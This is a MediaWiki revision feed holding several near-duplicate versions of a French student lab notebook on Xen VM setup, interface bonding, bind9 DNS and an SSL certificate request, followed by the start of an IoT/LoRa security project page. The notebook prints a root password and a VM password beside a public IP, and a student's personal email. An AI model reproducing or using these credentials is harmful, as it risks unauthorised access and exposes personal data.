 options bonding mode=1 miimon=100 downdelay=200 updelay=200&lt;br /&gt;
&lt;br /&gt;
Nous avons aussi configuré le fichier /etc/network/interfaces&lt;br /&gt;
en y incluant la configuration des différentes interfaces : eth100, eth101 ainsi que la configuration du bridge: br0 et du bonding: bond0.&lt;br /&gt;
&lt;br /&gt;
 #Bonding IMA5sc&lt;br /&gt;
 #auto eth100&lt;br /&gt;
 #iface eth0 inet manual&lt;br /&gt;
 #	bond-master bond0&lt;br /&gt;
 #	bond-primary eth100 eth101&lt;br /&gt;
 #	bond-mode 5&lt;br /&gt;
 &lt;br /&gt;
 #auto eth101&lt;br /&gt;
 #iface eth1 inet manual	&lt;br /&gt;
 #	bond-master bond0&lt;br /&gt;
 #	bond-primary eth100 eth101&lt;br /&gt;
 #	bond-mode 5&lt;br /&gt;
 &lt;br /&gt;
 #auto bond0&lt;br /&gt;
 #iface bond0 inet dhcp&lt;br /&gt;
 #	pre-up modprobe bonding&lt;br /&gt;
 #	pre-up ifconfig bond0 up&lt;br /&gt;
 #	pre-up /sbin/ifenslave  bond0 eth100 eth101&lt;br /&gt;
 #	down sbin/ifenslave -d bond0 eth100 eth101&lt;br /&gt;
 #	bonds-slaves none&lt;br /&gt;
 #&lt;br /&gt;
 #auto br0&lt;br /&gt;
 #iface br0 inet dhcp&lt;br /&gt;
 #	bridge-ports bond0&lt;br /&gt;
&lt;br /&gt;
=Séance 2=&lt;br /&gt;
&lt;br /&gt;
Installation de la machine virtuelle sur le serveur cordouan:&lt;br /&gt;
&lt;br /&gt;
 root@cordouan:/usr/local/xen/domains# xen-create-image --hostname=Frotteman --ip=193.48.57.161 --netmask=255.255.255.240 --gateway=193.48.57.171  --dir=/usr/local/xen --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie --password=glopglop&lt;br /&gt;
&lt;br /&gt;
 WARNING&lt;br /&gt;
 -------&lt;br /&gt;
 &lt;br /&gt;
  You appear to have a missing vif-script, or network-script, in the&lt;br /&gt;
  Xen configuration file /etc/xen/xend-config.sxp.&lt;br /&gt;
 &lt;br /&gt;
  Please fix this and restart Xend, or your guests will not be able&lt;br /&gt;
 to use any networking!&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 General Information&lt;br /&gt;
 --------------------&lt;br /&gt;
 Hostname       :  Frotteman&lt;br /&gt;
 Distribution   :  jessie&lt;br /&gt;
 Mirror         :  http://debian.polytech-lille.fr/debian/&lt;br /&gt;
 Partitions     :  swap            128M  (swap)&lt;br /&gt;
                   /               4G    (ext3)&lt;br /&gt;
 Image type     :  sparse&lt;br /&gt;
 Memory size    :  128M&lt;br /&gt;
 Kernel path    :  /boot/vmlinuz-3.14-2-amd64&lt;br /&gt;
 Initrd path    :  /boot/initrd.img-3.14-2-amd64&lt;br /&gt;
 &lt;br /&gt;
 Networking Information&lt;br /&gt;
 ----------------------&lt;br /&gt;
 IP Address 1   : 193.48.57.161 [MAC: 00:16:3E:F4:F8:CE]&lt;br /&gt;
 Netmask        : 255.255.255.240&lt;br /&gt;
 Gateway        : 193.48.57.171&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 Creating partition image: /usr/local/xen/domains/Frotteman/swap.img&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 Creating swap on /usr/local/xen/domains/Frotteman/swap.img&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 Creating partition image: /usr/local/xen/domains/Frotteman/disk.img&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 Creating ext3 filesystem on /usr/local/xen/domains/Frotteman/disk.img&lt;br /&gt;
 Done&lt;br /&gt;
 Installation method: debootstrap&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 Running hooks&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 No role scripts were specified.  Skipping &lt;br /&gt;
 &lt;br /&gt;
 Creating Xen configuration file&lt;br /&gt;
 Done &lt;br /&gt;
 &lt;br /&gt;
 No role scripts were specified.  Skipping&lt;br /&gt;
 Setting up root password&lt;br /&gt;
 Generating a password for the new guest.&lt;br /&gt;
 All done&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 Logfile produced at:&lt;br /&gt;
 	 /var/log/xen-tools/Frotteman.log&lt;br /&gt;
 &lt;br /&gt;
 Installation Summary&lt;br /&gt;
 ---------------------&lt;br /&gt;
 Hostname        :  Frotteman&lt;br /&gt;
 Distribution    :  jessie&lt;br /&gt;
 MAC Address     :  00:16:3E:F4:F8:CE&lt;br /&gt;
 IP Address(es)  :  193.48.57.161 &lt;br /&gt;
 RSA Fingerprint :  37:3f:a5:4a:6d:05:15:3d:55:44:e3:0b:7f:81:91:a2&lt;br /&gt;
 Root Password   :  fsBsiSE4&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Séance3=&lt;br /&gt;
&lt;br /&gt;
Création des partitions logiques pour la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
 lvcreate -L 10G -n /dev/virtual/ima5-Frotteman-home -v&lt;br /&gt;
 lvcreate -L 10G -n /dev/virtual/ima5-Frotteman-var -v&lt;br /&gt;
&lt;br /&gt;
Ajouts des partitions à la configuration de la machine virtuelle.&lt;br /&gt;
 'phy:/dev/virtual/ima5-Frotteman-home,xvdb,w',&lt;br /&gt;
 'phy:/dev/virtual/ima5-Frotteman-var,xvdc, w',&lt;br /&gt;
&lt;br /&gt;
=Séance4=&lt;br /&gt;
&lt;br /&gt;
Commande pour démarrer la VM lorsqu'elle est totalement éteinte :&lt;br /&gt;
&lt;br /&gt;
 xl create -c /etc/xen/Frotteman.cfg&lt;br /&gt;
&lt;br /&gt;
Nom de domaine réservé sur gandi.net&lt;br /&gt;
&lt;br /&gt;
 faispastomberlasavo.net&lt;br /&gt;
&lt;br /&gt;
=Séance5=&lt;br /&gt;
&lt;br /&gt;
Installation de bind9 sur la VM xen.&lt;br /&gt;
&lt;br /&gt;
Modification du fichier /etc/bind/named.conf.local&lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;faispastomberlasavo.net&amp;quot; {&lt;br /&gt;
           type master;&lt;br /&gt;
           file &amp;quot;/etc/bind/db.faispastomberlasavo.net&amp;quot;;&lt;br /&gt;
           allow-transfer { 217.70.177.40; };&lt;br /&gt;
      };&lt;br /&gt;
&lt;br /&gt;
Créez le fichier de zone /etc/bind/db.faispastomberlasavo.net&lt;br /&gt;
 &lt;br /&gt;
 TTL    604800&lt;br /&gt;
 @       IN      SOA     ns.faispastomberlasavo.net. root.faispastomberlasavo.net. (&lt;br /&gt;
                        2              ; Serial&lt;br /&gt;
                        604800         ; Refresh&lt;br /&gt;
                         86400         ; Retry&lt;br /&gt;
                       2419200         ; Expire&lt;br /&gt;
                        604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
         IN      NS      ns6.gandi.net.&lt;br /&gt;
 @       IN      NS      ns.faispastomberlasavo.net.&lt;br /&gt;
 ns      IN      A       193.48.57.161&lt;br /&gt;
 www     IN      A       193.48.57.161&lt;br /&gt;
 @       IN      A       193.48.57.161&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Redémarrer bind&lt;br /&gt;
&lt;br /&gt;
 /etc/init.d/bind9 restart&lt;br /&gt;
&lt;br /&gt;
Changez la configuration des serveurs du domaine Gandi &lt;br /&gt;
 DNS1: ns.faispastomberlasavo.net&lt;br /&gt;
 DNS2: ns6.gandi.net&lt;br /&gt;
&lt;br /&gt;
Commande:&lt;br /&gt;
 nslookup www.faispastomberlasavo.net&lt;br /&gt;
&lt;br /&gt;
Résultat:&lt;br /&gt;
 Server:		193.48.57.161&lt;br /&gt;
 Address:	193.48.57.161#53 &lt;br /&gt;
 &lt;br /&gt;
 Name:	www.faispastomberlasavo.net&lt;br /&gt;
 Address: 193.48.57.161&lt;br /&gt;
&lt;br /&gt;
=Séance6=&lt;br /&gt;
commande pour générer certificat SSL &lt;br /&gt;
 &lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha1 -keyout serveur.key -out serveur.csr&lt;br /&gt;
 Country Name (2 letter code) [AU]:FR&lt;br /&gt;
 State or Province Name (full name) [Some-State]:France&lt;br /&gt;
 Locality Name (eg, city) []:Lille&lt;br /&gt;
 Organization Name (eg, company) [Internet Widgits Pty Ltd]:Polytech&lt;br /&gt;
 Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
 Common Name (e.g. server FQDN or YOUR name) []:faispastomberlasavo.net&lt;br /&gt;
 Email Address []:cedricduval94@gmail.com&lt;br /&gt;
&lt;br /&gt;
On ajoute le contenu du fichier serveur.csr dans gandi&lt;/div&gt;</summary>
		<author><name>Cduval</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2016_groupe_n%C2%B01&amp;diff=35468</id>
		<title>Cahier 2016 groupe n°1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2016_groupe_n%C2%B01&amp;diff=35468"/>
				<updated>2016-11-28T13:49:56Z</updated>
		
		<summary type="html">&lt;p&gt;Cduval : /* Séance5 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Séance 1=&lt;br /&gt;
&lt;br /&gt;
Pour la première séance nous avons installé ifenslave 2.6 sur le serveur et ajout d'un alias pour que le module bond soit activé avec les bonnes options :&lt;br /&gt;
&lt;br /&gt;
 alias bond0 bonding&lt;br /&gt;
 options bonding mode=1 miimon=100 downdelay=200 updelay=200&lt;br /&gt;
&lt;br /&gt;
Nous avons aussi configuré le fichier /etc/network/interfaces&lt;br /&gt;
en y incluant la configuration des différentes interfaces : eth100, eth101 ainsi que la configuration du bridge: br0 et du bonding: bond0.&lt;br /&gt;
&lt;br /&gt;
 #Bonding IMA5sc&lt;br /&gt;
 #auto eth100&lt;br /&gt;
 #iface eth0 inet manual&lt;br /&gt;
 #	bond-master bond0&lt;br /&gt;
 #	bond-primary eth100 eth101&lt;br /&gt;
 #	bond-mode 5&lt;br /&gt;
 &lt;br /&gt;
 #auto eth101&lt;br /&gt;
 #iface eth1 inet manual	&lt;br /&gt;
 #	bond-master bond0&lt;br /&gt;
 #	bond-primary eth100 eth101&lt;br /&gt;
 #	bond-mode 5&lt;br /&gt;
 &lt;br /&gt;
 #auto bond0&lt;br /&gt;
 #iface bond0 inet dhcp&lt;br /&gt;
 #	pre-up modprobe bonding&lt;br /&gt;
 #	pre-up ifconfig bond0 up&lt;br /&gt;
 #	pre-up /sbin/ifenslave  bond0 eth100 eth101&lt;br /&gt;
 #	down sbin/ifenslave -d bond0 eth100 eth101&lt;br /&gt;
 #	bonds-slaves none&lt;br /&gt;
 #&lt;br /&gt;
 #auto br0&lt;br /&gt;
 #iface br0 inet dhcp&lt;br /&gt;
 #	bridge-ports bond0&lt;br /&gt;
&lt;br /&gt;
=Séance 2=&lt;br /&gt;
&lt;br /&gt;
Installation de la machine virtuelle sur le serveur cordouan:&lt;br /&gt;
&lt;br /&gt;
 root@cordouan:/usr/local/xen/domains# xen-create-image --hostname=Frotteman --ip=193.48.57.161 --netmask=255.255.255.240 --gateway=193.48.57.171  --dir=/usr/local/xen --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie --password=glopglop&lt;br /&gt;
&lt;br /&gt;
 WARNING&lt;br /&gt;
 -------&lt;br /&gt;
 &lt;br /&gt;
  You appear to have a missing vif-script, or network-script, in the&lt;br /&gt;
  Xen configuration file /etc/xen/xend-config.sxp.&lt;br /&gt;
 &lt;br /&gt;
  Please fix this and restart Xend, or your guests will not be able&lt;br /&gt;
 to use any networking!&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 General Information&lt;br /&gt;
 --------------------&lt;br /&gt;
 Hostname       :  Frotteman&lt;br /&gt;
 Distribution   :  jessie&lt;br /&gt;
 Mirror         :  http://debian.polytech-lille.fr/debian/&lt;br /&gt;
 Partitions     :  swap            128M  (swap)&lt;br /&gt;
                   /               4G    (ext3)&lt;br /&gt;
 Image type     :  sparse&lt;br /&gt;
 Memory size    :  128M&lt;br /&gt;
 Kernel path    :  /boot/vmlinuz-3.14-2-amd64&lt;br /&gt;
 Initrd path    :  /boot/initrd.img-3.14-2-amd64&lt;br /&gt;
 &lt;br /&gt;
 Networking Information&lt;br /&gt;
 ----------------------&lt;br /&gt;
 IP Address 1   : 193.48.57.161 [MAC: 00:16:3E:F4:F8:CE]&lt;br /&gt;
 Netmask        : 255.255.255.240&lt;br /&gt;
 Gateway        : 193.48.57.171&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 Creating partition image: /usr/local/xen/domains/Frotteman/swap.img&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 Creating swap on /usr/local/xen/domains/Frotteman/swap.img&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 Creating partition image: /usr/local/xen/domains/Frotteman/disk.img&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 Creating ext3 filesystem on /usr/local/xen/domains/Frotteman/disk.img&lt;br /&gt;
 Done&lt;br /&gt;
 Installation method: debootstrap&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 Running hooks&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 No role scripts were specified.  Skipping &lt;br /&gt;
 &lt;br /&gt;
 Creating Xen configuration file&lt;br /&gt;
 Done &lt;br /&gt;
 &lt;br /&gt;
 No role scripts were specified.  Skipping&lt;br /&gt;
 Setting up root password&lt;br /&gt;
 Generating a password for the new guest.&lt;br /&gt;
 All done&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 Logfile produced at:&lt;br /&gt;
 	 /var/log/xen-tools/Frotteman.log&lt;br /&gt;
 &lt;br /&gt;
 Installation Summary&lt;br /&gt;
 ---------------------&lt;br /&gt;
 Hostname        :  Frotteman&lt;br /&gt;
 Distribution    :  jessie&lt;br /&gt;
 MAC Address     :  00:16:3E:F4:F8:CE&lt;br /&gt;
 IP Address(es)  :  193.48.57.161 &lt;br /&gt;
 RSA Fingerprint :  37:3f:a5:4a:6d:05:15:3d:55:44:e3:0b:7f:81:91:a2&lt;br /&gt;
 Root Password   :  fsBsiSE4&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Séance3=&lt;br /&gt;
&lt;br /&gt;
Création des partitions logiques pour la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
 lvcreate -L 10G -n /dev/virtual/ima5-Frotteman-home -v&lt;br /&gt;
 lvcreate -L 10G -n /dev/virtual/ima5-Frotteman-var -v&lt;br /&gt;
&lt;br /&gt;
Ajouts des partitions à la configuration de la machine virtuelle.&lt;br /&gt;
 'phy:/dev/virtual/ima5-Frotteman-home,xvdb,w',&lt;br /&gt;
 'phy:/dev/virtual/ima5-Frotteman-var,xvdc, w',&lt;br /&gt;
&lt;br /&gt;
=Séance4=&lt;br /&gt;
&lt;br /&gt;
Commande pour démarrer la VM lorsqu'elle est totalement éteinte :&lt;br /&gt;
&lt;br /&gt;
 xl create -c /etc/xen/Frotteman.cfg&lt;br /&gt;
&lt;br /&gt;
Nom de domaine réservé sur gandi.net&lt;br /&gt;
&lt;br /&gt;
 faispastomberlasavo.net&lt;br /&gt;
&lt;br /&gt;
=Séance5=&lt;br /&gt;
&lt;br /&gt;
Installation de bind9 sur la VM xen.&lt;br /&gt;
&lt;br /&gt;
Modification du fichier /etc/bind/named.conf.local&lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;faispastomberlasavo.net&amp;quot; {&lt;br /&gt;
           type master;&lt;br /&gt;
           file &amp;quot;/etc/bind/db.faispastomberlasavo.net&amp;quot;;&lt;br /&gt;
           allow-transfer { 217.70.177.40; };&lt;br /&gt;
      };&lt;br /&gt;
&lt;br /&gt;
Créez le fichier de zone /etc/bind/db.faispastomberlasavo.net&lt;br /&gt;
 &lt;br /&gt;
 TTL    604800&lt;br /&gt;
 @       IN      SOA     ns.faispastomberlasavo.net. root.faispastomberlasavo.net. (&lt;br /&gt;
                        2              ; Serial&lt;br /&gt;
                        604800         ; Refresh&lt;br /&gt;
                         86400         ; Retry&lt;br /&gt;
                       2419200         ; Expire&lt;br /&gt;
                        604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
         IN      NS      ns6.gandi.net.&lt;br /&gt;
 @       IN      NS      ns.faispastomberlasavo.net.&lt;br /&gt;
 ns      IN      A       193.48.57.161&lt;br /&gt;
 www     IN      A       193.48.57.161&lt;br /&gt;
 @       IN      A       193.48.57.161&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Redémarrer bind&lt;br /&gt;
&lt;br /&gt;
 /etc/init.d/bind9 restart&lt;br /&gt;
&lt;br /&gt;
Changez la configuration des serveurs du domaine Gandi &lt;br /&gt;
 DNS1: ns.faispastomberlasavo.net&lt;br /&gt;
 DNS2: ns6.gandi.net&lt;br /&gt;
&lt;br /&gt;
Commande:&lt;br /&gt;
 nslookup www.faispastomberlasavo.net&lt;br /&gt;
&lt;br /&gt;
Résultat:&lt;br /&gt;
 Server:		193.48.57.161&lt;br /&gt;
 Address:	193.48.57.161#53 &lt;br /&gt;
 &lt;br /&gt;
 Name:	www.faispastomberlasavo.net&lt;br /&gt;
 Address: 193.48.57.161&lt;br /&gt;
&lt;br /&gt;
=Séance6=&lt;br /&gt;
commande pour générer certificat SSL &lt;br /&gt;
 &lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha1 -keyout serveur.key -out serveur.csr&lt;br /&gt;
 Country Name (2 letter code) [AU]:FR&lt;br /&gt;
 State or Province Name (full name) [Some-State]:France&lt;br /&gt;
 Locality Name (eg, city) []:Lille&lt;br /&gt;
 Organization Name (eg, company) [Internet Widgits Pty Ltd]:Polytech&lt;br /&gt;
 Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
 Common Name (e.g. server FQDN or YOUR name) []:faispastomberlasavo.net&lt;br /&gt;
 Email Address []:cedricduval94@gmail.com&lt;br /&gt;
&lt;br /&gt;
On ajoute le serveur.csr dans gandi&lt;/div&gt;</summary>
		<author><name>Cduval</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2016_groupe_n%C2%B01&amp;diff=35467</id>
		<title>Cahier 2016 groupe n°1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2016_groupe_n%C2%B01&amp;diff=35467"/>
				<updated>2016-11-28T13:48:41Z</updated>
		
		<summary type="html">&lt;p&gt;Cduval : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Séance 1=&lt;br /&gt;
&lt;br /&gt;
Pour la première séance nous avons installé ifenslave 2.6 sur le serveur et ajout d'un alias pour que le module bond soit activé avec les bonnes options :&lt;br /&gt;
&lt;br /&gt;
 alias bond0 bonding&lt;br /&gt;
 options bonding mode=1 miimon=100 downdelay=200 updelay=200&lt;br /&gt;
&lt;br /&gt;
Nous avons aussi configuré le fichier /etc/network/interfaces&lt;br /&gt;
en y incluant la configuration des différentes interfaces : eth100, eth101 ainsi que la configuration du bridge: br0 et du bonding: bond0.&lt;br /&gt;
&lt;br /&gt;
 #Bonding IMA5sc&lt;br /&gt;
 #auto eth100&lt;br /&gt;
 #iface eth0 inet manual&lt;br /&gt;
 #	bond-master bond0&lt;br /&gt;
 #	bond-primary eth100 eth101&lt;br /&gt;
 #	bond-mode 5&lt;br /&gt;
 &lt;br /&gt;
 #auto eth101&lt;br /&gt;
 #iface eth1 inet manual	&lt;br /&gt;
 #	bond-master bond0&lt;br /&gt;
 #	bond-primary eth100 eth101&lt;br /&gt;
 #	bond-mode 5&lt;br /&gt;
 &lt;br /&gt;
 #auto bond0&lt;br /&gt;
 #iface bond0 inet dhcp&lt;br /&gt;
 #	pre-up modprobe bonding&lt;br /&gt;
 #	pre-up ifconfig bond0 up&lt;br /&gt;
 #	pre-up /sbin/ifenslave  bond0 eth100 eth101&lt;br /&gt;
 #	down sbin/ifenslave -d bond0 eth100 eth101&lt;br /&gt;
 #	bonds-slaves none&lt;br /&gt;
 #&lt;br /&gt;
 #auto br0&lt;br /&gt;
 #iface br0 inet dhcp&lt;br /&gt;
 #	bridge-ports bond0&lt;br /&gt;
&lt;br /&gt;
=Séance 2=&lt;br /&gt;
&lt;br /&gt;
Installation de la machine virtuelle sur le serveur cordouan:&lt;br /&gt;
&lt;br /&gt;
 root@cordouan:/usr/local/xen/domains# xen-create-image --hostname=Frotteman --ip=193.48.57.161 --netmask=255.255.255.240 --gateway=193.48.57.171  --dir=/usr/local/xen --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie --password=glopglop&lt;br /&gt;
&lt;br /&gt;
 WARNING&lt;br /&gt;
 -------&lt;br /&gt;
 &lt;br /&gt;
  You appear to have a missing vif-script, or network-script, in the&lt;br /&gt;
  Xen configuration file /etc/xen/xend-config.sxp.&lt;br /&gt;
 &lt;br /&gt;
  Please fix this and restart Xend, or your guests will not be able&lt;br /&gt;
 to use any networking!&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 General Information&lt;br /&gt;
 --------------------&lt;br /&gt;
 Hostname       :  Frotteman&lt;br /&gt;
 Distribution   :  jessie&lt;br /&gt;
 Mirror         :  http://debian.polytech-lille.fr/debian/&lt;br /&gt;
 Partitions     :  swap            128M  (swap)&lt;br /&gt;
                   /               4G    (ext3)&lt;br /&gt;
 Image type     :  sparse&lt;br /&gt;
 Memory size    :  128M&lt;br /&gt;
 Kernel path    :  /boot/vmlinuz-3.14-2-amd64&lt;br /&gt;
 Initrd path    :  /boot/initrd.img-3.14-2-amd64&lt;br /&gt;
 &lt;br /&gt;
 Networking Information&lt;br /&gt;
 ----------------------&lt;br /&gt;
 IP Address 1   : 193.48.57.161 [MAC: 00:16:3E:F4:F8:CE]&lt;br /&gt;
 Netmask        : 255.255.255.240&lt;br /&gt;
 Gateway        : 193.48.57.171&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 Creating partition image: /usr/local/xen/domains/Frotteman/swap.img&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 Creating swap on /usr/local/xen/domains/Frotteman/swap.img&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 Creating partition image: /usr/local/xen/domains/Frotteman/disk.img&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 Creating ext3 filesystem on /usr/local/xen/domains/Frotteman/disk.img&lt;br /&gt;
 Done&lt;br /&gt;
 Installation method: debootstrap&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 Running hooks&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 No role scripts were specified.  Skipping &lt;br /&gt;
 &lt;br /&gt;
 Creating Xen configuration file&lt;br /&gt;
 Done &lt;br /&gt;
 &lt;br /&gt;
 No role scripts were specified.  Skipping&lt;br /&gt;
 Setting up root password&lt;br /&gt;
 Generating a password for the new guest.&lt;br /&gt;
 All done&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 Logfile produced at:&lt;br /&gt;
 	 /var/log/xen-tools/Frotteman.log&lt;br /&gt;
 &lt;br /&gt;
 Installation Summary&lt;br /&gt;
 ---------------------&lt;br /&gt;
 Hostname        :  Frotteman&lt;br /&gt;
 Distribution    :  jessie&lt;br /&gt;
 MAC Address     :  00:16:3E:F4:F8:CE&lt;br /&gt;
 IP Address(es)  :  193.48.57.161 &lt;br /&gt;
 RSA Fingerprint :  37:3f:a5:4a:6d:05:15:3d:55:44:e3:0b:7f:81:91:a2&lt;br /&gt;
 Root Password   :  fsBsiSE4&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Séance3=&lt;br /&gt;
&lt;br /&gt;
Création des partitions logiques pour la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
 lvcreate -L 10G -n /dev/virtual/ima5-Frotteman-home -v&lt;br /&gt;
 lvcreate -L 10G -n /dev/virtual/ima5-Frotteman-var -v&lt;br /&gt;
&lt;br /&gt;
Ajouts des partitions à la configuration de la machine virtuelle.&lt;br /&gt;
 'phy:/dev/virtual/ima5-Frotteman-home,xvdb,w',&lt;br /&gt;
 'phy:/dev/virtual/ima5-Frotteman-var,xvdc, w',&lt;br /&gt;
&lt;br /&gt;
=Séance4=&lt;br /&gt;
&lt;br /&gt;
Commande pour démarrer la VM lorsqu'elle est totalement éteinte :&lt;br /&gt;
&lt;br /&gt;
 xl create -c /etc/xen/Frotteman.cfg&lt;br /&gt;
&lt;br /&gt;
Nom de domaine réservé sur gandi.net&lt;br /&gt;
&lt;br /&gt;
 faispastomberlasavo.net&lt;br /&gt;
&lt;br /&gt;
=Séance5=&lt;br /&gt;
&lt;br /&gt;
Installation de bind9 sur la VM xen.&lt;br /&gt;
&lt;br /&gt;
Modification du fichier /etc/bind/named.conf.local&lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;faispastomberlasavo.net&amp;quot; {&lt;br /&gt;
           type master;&lt;br /&gt;
           file &amp;quot;/etc/bind/db.faispastomberlasavo.net&amp;quot;;&lt;br /&gt;
           allow-transfer { 217.70.177.40; };&lt;br /&gt;
      };&lt;br /&gt;
&lt;br /&gt;
Créez le fichier de zone /etc/bind/db.faispastomberlasavo.net&lt;br /&gt;
 &lt;br /&gt;
TTL    604800&lt;br /&gt;
@       IN      SOA     ns.faispastomberlasavo.net. root.faispastomberlasavo.ne$&lt;br /&gt;
                        2              ; Serial&lt;br /&gt;
                        604800         ; Refresh&lt;br /&gt;
                         86400         ; Retry&lt;br /&gt;
                       2419200         ; Expire&lt;br /&gt;
                        604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
        IN      NS      ns6.gandi.net.&lt;br /&gt;
@       IN      NS      ns.faispastomberlasavo.net.&lt;br /&gt;
ns      IN      A       193.48.57.161&lt;br /&gt;
www     IN      A       193.48.57.161&lt;br /&gt;
@       IN      A       193.48.57.161&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Redémarrer bind&lt;br /&gt;
&lt;br /&gt;
 /etc/init.d/bind9 restart&lt;br /&gt;
&lt;br /&gt;
Changez la configuration des serveurs du domaine Gandi &lt;br /&gt;
 DNS1: ns.faispastomberlasavo.net&lt;br /&gt;
 DNS2: ns6.gandi.net&lt;br /&gt;
&lt;br /&gt;
Commande:&lt;br /&gt;
 nslookup www.faispastomberlasavo.net&lt;br /&gt;
&lt;br /&gt;
Résultat:&lt;br /&gt;
 Server:		193.48.57.161&lt;br /&gt;
 Address:	193.48.57.161#53 &lt;br /&gt;
 &lt;br /&gt;
 Name:	www.faispastomberlasavo.net&lt;br /&gt;
 Address: 193.48.57.161&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
(ne marche plus depuis un autre pc que la vm???)&lt;br /&gt;
&lt;br /&gt;
commande pour générer certificat SSL &lt;br /&gt;
 &lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha1 -keyout serveur.key -out serveur.csr&lt;br /&gt;
 Country Name (2 letter code) [AU]:FR&lt;br /&gt;
 State or Province Name (full name) [Some-State]:France&lt;br /&gt;
 Locality Name (eg, city) []:Lille&lt;br /&gt;
 Organization Name (eg, company) [Internet Widgits Pty Ltd]:Polytech&lt;br /&gt;
 Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
 Common Name (e.g. server FQDN or YOUR name) []:faispastomberlasavo.net&lt;br /&gt;
 Email Address []:cedricduval94@gmail.com&lt;br /&gt;
&lt;br /&gt;
On ajoute le serveur.csr dans gandi&lt;/div&gt;</summary>
		<author><name>Cduval</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=P64_S%C3%A9curit%C3%A9_de_l%27IOT&amp;diff=35392</id>
		<title>P64 Sécurité de l'IOT</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=P64_S%C3%A9curit%C3%A9_de_l%27IOT&amp;diff=35392"/>
				<updated>2016-11-24T10:31:53Z</updated>
		
		<summary type="html">&lt;p&gt;Cduval : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Objectif du PFE=&lt;br /&gt;
&lt;br /&gt;
L’internet des objets (IoT) se démocratise de plus en plus dans nos appareils électroniques et la question de la sécurité se pose. Si un de ces objets connait une défaillance, l’ensemble des données lié à son réseau pourrait être compromises.&lt;br /&gt;
L’objectif de ce PFE est d’analyser le protocole réseau LORA et de déceler les failles de sécurité afin de les corriger.&lt;br /&gt;
&lt;br /&gt;
=Réseau LoRa=&lt;br /&gt;
&lt;br /&gt;
Le réseau LoRa ( Long Range ) est une technologie permettant aux objets connectés d’échanger des données de petites tailles. Le débit du réseau varie de 0,3 kb/s à 50 kb/s. La première utilité est que la consommation des objets est très faible garantissant une autonomie allant jusqu’à 10 ans. La portée maximale est d’environ 20km.&lt;br /&gt;
L'architecture du réseau LoRaWan est utilisée sous forme de réseau hiérarchique où chaque passerelle peut transmettre les messages entre les appareils terminaux et un serveur de réseau central en arrière-plan.&lt;br /&gt;
&lt;br /&gt;
Le protocole LoRa a 3 modes de fonctionnement:&lt;br /&gt;
&lt;br /&gt;
*L’envoi d’informations vers une antenne puis la réception d’informations immédiatement après. Le serveur ne pourra envoyer d’informations qu’au prochain cycle d’envoi. Ce mode à la moins grande consommation d’énergie et permet d’envoyer des données de manière régulière ( ex: capteur).  La portée maximale est d’environ 20 km en zone rurale et 1 km en zone urbaine.&lt;br /&gt;
&lt;br /&gt;
*La réception de données à intervalles réguliers et paramétrés à l’avance.&lt;br /&gt;
&lt;br /&gt;
